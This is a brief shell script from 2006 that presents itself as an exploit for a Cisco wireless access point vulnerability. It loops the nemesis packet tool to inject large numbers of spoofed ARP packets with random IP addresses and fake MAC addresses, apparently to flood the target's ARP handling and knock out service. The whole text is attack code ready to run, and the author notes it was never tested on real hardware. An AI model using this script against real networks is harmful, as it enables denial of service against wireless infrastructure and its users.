#!/bin/sh
# kokanin 20060115 - yay sunday morning! this is an exploit for
# http://www.cisco.com/warp/public/707/cisco-sa-20060112-wireless.shtml
# Made for my man in Hong Kong, j0 Ole, greetings from www.lort.dk
# Uses/needs nemesis(.sf.net) and jot (FreeBSD builtin) for random ip generation.
# The script should be tested against an actual Cisco AP to determine the needed
# packetamount and stuff, but I don't have one.

# Where is nemesis?
nemesis=/usr/local/bin/nemesis

# did the user supply a device and the amount?
if [ "x$2" = "x" ]; then (echo "usage: blabla.sh <interface> <amount>" && kill $$) ;fi  
for i in `jot $2` ; do 
oct1=`jot -r 1 1 255`;oct2=`jot -r 1 1 255`;oct3=`jot -r 1 1 255`;oct4=`jot -r 1 1 255`; 
$nemesis arp -v -S $oct1.$oct2.$oct3.$oct4 -D $oct4.$oct3.$oct2.$oct1 \
-h fe:da:be:fe:da:be -m fe:da:be:fe:da:be -d $1 -H fe:da:be:fe:da:be \
-M ff:ff:ff:ff:ff:ff 
done | grep Protocol | awk '{ print "injecting: " $3" "$4" "$5}'
echo "done"